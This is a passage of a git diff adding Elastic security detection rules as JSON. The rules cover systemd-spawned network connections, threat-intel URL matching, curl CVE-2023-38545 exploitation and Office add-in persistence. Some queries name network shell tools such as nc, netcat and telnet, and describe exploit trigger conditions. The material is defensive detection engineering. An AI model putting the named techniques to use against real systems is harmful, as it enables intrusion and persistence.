"type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f3475224-b179-4f78-8877-c2bd64c26b88", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "type": "eql", + "version": 109 + }, + "id": "f3475224-b179-4f78-8877-c2bd64c26b88_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f3818c85-2207-4b51-8a28-d70fb156ee87_1.json b/packages/security_detection_engine/kibana/security_rule/f3818c85-2207-4b51-8a28-d70fb156ee87_1.json new file mode 100644 index 00000000000..35f8d3b0977 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f3818c85-2207-4b51-8a28-d70fb156ee87_1.json @@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects suspicious network events executed by systemd, potentially indicating persistence through a systemd backdoor. Systemd is a system and service manager for Linux operating systems, used to initialize and manage system processes. Attackers can backdoor systemd for persistence by creating or modifying systemd unit files to execute malicious scripts or commands, or by replacing legitimate systemd binaries with compromised ones, ensuring that their malicious code is automatically executed at system startup or during certain system events.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Network Connection via systemd", + "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and\n process.parent.name == \"systemd\" and process.name in (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\"\n )\n ] by process.entity_id\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\"\n ] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f3818c85-2207-4b51-8a28-d70fb156ee87", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Command and Control", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.002", + "name": "Systemd Service", + "reference": "https://attack.mitre.org/techniques/T1543/002/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + } + ], + "type": "eql", + "version": 1 + }, + "id": "f3818c85-2207-4b51-8a28-d70fb156ee87_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f3818c85-2207-4b51-8a28-d70fb156ee87_2.json b/packages/security_detection_engine/kibana/security_rule/f3818c85-2207-4b51-8a28-d70fb156ee87_2.json new file mode 100644 index 00000000000..7513bfd51d8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f3818c85-2207-4b51-8a28-d70fb156ee87_2.json @@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects suspicious network events executed by systemd, potentially indicating persistence through a systemd backdoor. Systemd is a system and service manager for Linux operating systems, used to initialize and manage system processes. Attackers can backdoor systemd for persistence by creating or modifying systemd unit files to execute malicious scripts or commands, or by replacing legitimate systemd binaries with compromised ones, ensuring that their malicious code is automatically executed at system startup or during certain system events.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Network Connection via systemd", + "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.parent.name == \"systemd\" and process.name in (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\"\n )\n ] by process.entity_id\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\"\n ] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f3818c85-2207-4b51-8a28-d70fb156ee87", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Command and Control", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.002", + "name": "Systemd Service", + "reference": "https://attack.mitre.org/techniques/T1543/002/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + } + ], + "type": "eql", + "version": 2 + }, + "id": "f3818c85-2207-4b51-8a28-d70fb156ee87_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_6.json b/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_6.json new file mode 100644 index 00000000000..a71ee1d3b5f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_6.json @@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule is triggered when a URL indicator from the Threat Intel Filebeat module or integrations has a match against an event that contains URL data, like DNS events, network logs, etc.", + "from": "now-65m", + "index": [ + "auditbeat-*", + "endgame-*", + "filebeat-*", + "logs-*", + "packetbeat-*", + "winlogbeat-*" + ], + "interval": "1h", + "language": "kuery", + "license": "Elastic License v2", + "name": "Threat Intel URL Indicator Match", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel URL Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index.\n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a URL indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains URL data, like DNS events, network logs, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the URL, which can be found in the `threat.indicator.matched.atomic` field:\n - Identify the type of malicious activity related to the URL (phishing, malware, etc.).\n - Check the reputation of the IP address in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Execute a WHOIS lookup to retrieve information about the domain registration and contacts to report abuse.\n - If dealing with a phishing incident:\n - Contact the user to gain more information around the delivery method, information sent, etc.\n - Analyze whether the URL is trying to impersonate a legitimate address. Look for typosquatting, extra or unusual subdomains, or other anomalies that could lure the user.\n - Investigate the phishing page to identify which information may have been sent to the attacker by the user.\n- Identify the process responsible for the connection, and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- False positives might occur after large and publicly written campaigns if curious employees interact with attacker infrastructure.\n- Some feeds may include internal or known benign addresses by mistake (e.g., 8.8.8.8, google.com, 127.0.0.1, etc.). Make sure you understand how blocking a specific domain or address might impact the organization or normal system functioning.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Consider reporting the address for abuse using the provided contact information.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "url.full:*\n", + "references": [ + "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", + "https://www.elastic.co/guide/en/security/master/es-threat-intel-integrations.html", + "https://www.elastic.co/security/tip" + ], + "required_fields": [ + { + "ecs": true, + "name": "url.full", + "type": "wildcard" + } + ], + "risk_score": 99, + "rule_id": "f3e22c8b-ea47-45d1-b502-b57b6de950b3", + "setup": "## Setup\n\nThis rule needs threat intelligence indicators to work.\nThreat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration),\nthe [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration),\nor a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).\n", + "severity": "critical", + "tags": [ + "OS: Windows", + "Data Source: Elastic Endgame", + "Rule Type: Indicator Match" + ], + "threat_filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.category", + "negate": false, + "params": { + "query": "threat" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.category": "threat" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.kind", + "negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.type", + "negate": false, + "params": { + "query": "indicator" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.type": "indicator" + } + } + } + ], + "threat_index": [ + "filebeat-*", + "logs-ti_*" + ], + "threat_indicator_path": "threat.indicator", + "threat_language": "kuery", + "threat_mapping": [ + { + "entries": [ + { + "field": "url.full", + "type": "mapping", + "value": "threat.indicator.url.full" + } + ] + }, + { + "entries": [ + { + "field": "url.original", + "type": "mapping", + "value": "threat.indicator.url.original" + } + ] + } + ], + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.url.full:* and not labels.is_ioc_transform_source:\"true\"", + "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", + "timeline_title": "Generic Threat Match Timeline", + "timestamp_override": "event.ingested", + "type": "threat_match", + "version": 6 + }, + "id": "f3e22c8b-ea47-45d1-b502-b57b6de950b3_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_5.json b/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_5.json new file mode 100644 index 00000000000..095c1e29732 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_5.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version <= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version >= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential curl CVE-2023-38545 Exploitation", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name == \"curl\" \nand (\n process.args : (\"--socks5-hostname\", \"--proxy\", \"--preproxy\", \"socks5*\") or \n process.env_vars: (\"http_proxy=socks5h://*\", \"HTTPS_PROXY=socks5h://*\", \"ALL_PROXY=socks5h://*\")\n) and length(process.command_line) > 255 and \nnot process.parent.name in (\"cf-agent\", \"agent-run\", \"agent-check\", \"rudder\", \"agent-inventory\", \"cf-execd\") and\nnot process.args == \"/opt/rudder/bin/curl\"\n", + "references": [ + "https://curl.se/docs/CVE-2023-38545.html", + "https://daniel.haxx.se/blog/2023/10/11/curl-8-4-0/", + "https://twitter.com/_JohnHammond/status/1711986412554531015" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.env_vars", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f41296b4-9975-44d6-9486-514c6f635b2d", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\nElastic Defend integration does not collect environment variable logging by default.\nIn order to capture this behavior, this rule requires a specific configuration option set within the advanced settings of the Elastic Defend integration.\n #### To set up environment variable capture for an Elastic Agent policy:\n- Go to \u201cSecurity \u2192 Manage \u2192 Policies\u201d.\n- Select an \u201cElastic Agent policy\u201d.\n- Click \u201cShow advanced settings\u201d.\n- Scroll down or search for \u201clinux.advanced.capture_env_vars\u201d.\n- Enter the names of environment variables you want to capture, separated by commas.\n- For this rule the linux.advanced.capture_env_vars variable should be set to \"http_proxy,HTTPS_PROXY,ALL_PROXY\".\n- Click \u201cSave\u201d.\nAfter saving the integration change, the Elastic Agents running this policy will be updated and the rule will function properly.\nFor more information on capturing environment variables refer to the [helper guide](https://www.elastic.co/guide/en/security/current/environment-variable-capture.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Use Case: Vulnerability", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1203", + "name": "Exploitation for Client Execution", + "reference": "https://attack.mitre.org/techniques/T1203/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "f41296b4-9975-44d6-9486-514c6f635b2d_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_107.json b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_107.json new file mode 100644 index 00000000000..89ce9060bb7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_107.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to establish persistence on an endpoint by abusing Microsoft Office add-ins.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Microsoft Office AddIns", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : (\"wll\",\"xll\",\"ppa\",\"ppam\",\"xla\",\"xlam\") and\n file.path :\n (\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\Startup\\\\*\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\AddIns\\\\*\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel\\\\XLSTART\\\\*\"\n )\n", + "references": [ + "https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f44fa4b6-524c-4e87-8d9e-a32599e4fb7c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1137", + "name": "Office Application Startup", + "reference": "https://attack.mitre.org/techniques/T1137/", + "subtechnique": [ + { + "id": "T1137.006", + "name": "Add-ins", + "reference": "https://attack.mitre.org/techniques/T1137/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_108.json b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_108.json new file mode 100644 index 00000000000..587ce2938b3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_108.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to establish persistence on an endpoint by abusing Microsoft Office add-ins.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Microsoft Office AddIns", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : (\"wll\",\"xll\",\"ppa\",\"ppam\",\"xla\",\"xlam\") and\n file.path :\n (\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\Startup\\\\*\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\AddIns\\\\*\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel\\\\XLSTART\\\\*\"\n )\n", + "references": [ + "https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f44fa4b6-524c-4e87-8d9e-a32599e4fb7c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", 